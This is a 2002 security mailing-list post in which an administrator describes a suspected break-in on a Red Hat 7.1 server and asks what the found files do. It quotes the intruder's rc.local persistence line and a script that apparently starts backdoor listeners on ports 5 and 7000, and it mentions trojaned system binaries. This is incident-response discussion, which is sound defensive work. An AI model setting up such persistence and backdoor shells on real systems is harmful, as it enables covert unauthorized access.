hpd, afb, sc, and sn

From: Gordon Chamberlin (glac@visualize.com)
Date: 12/20/02

  • Next message: Jacek Lipkowski: "port 3717/udp?" 
    From: Gordon Chamberlin <glac@visualize.com>
To: incidents@securityfocus.com
Date: 20 Dec 2002 14:11:31 -0700

    I found suspicious looking files on a Redhat 7.1 Linux server earlier
    today. Can anyone confirm or deny that the machine has been hacked?

    The files:
    /usr/bin/hpd
    /usr/bin/afb
    /usr/bin/sn

    The following line is in /etc/rc.local:
    /usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null

    The contents of hpd are:
    #!/bin/sh
    /usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null
    /usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null

    namp reports the following ports open:
    Port State Service
    5/tcp open rje
    22/tcp open ssh
    25/tcp open smtp
    53/tcp open domain
    80/tcp open http
    111/tcp open sunrpc
    443/tcp open https
    808/tcp open unknown
    1024/tcp open kdm
    3306/tcp open mysql
    7000/tcp open afs3-fileserver
    8009/tcp open ajp13

    According to an rpm -V, all kinds of binaries have been changed: ps,
    top, netstat, ifconfig, ...

    I copied a good version of ps in and found the two afb processes
    running.

    Anyone know about this hack, what afb does and/or how they usually get
    in?

    Embarrassedly,
     -Gordon 

    -- 
  Gordon Chamberlin             Software Architect
  Visualize, Inc.               http://www.visualize.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
    • Quantcast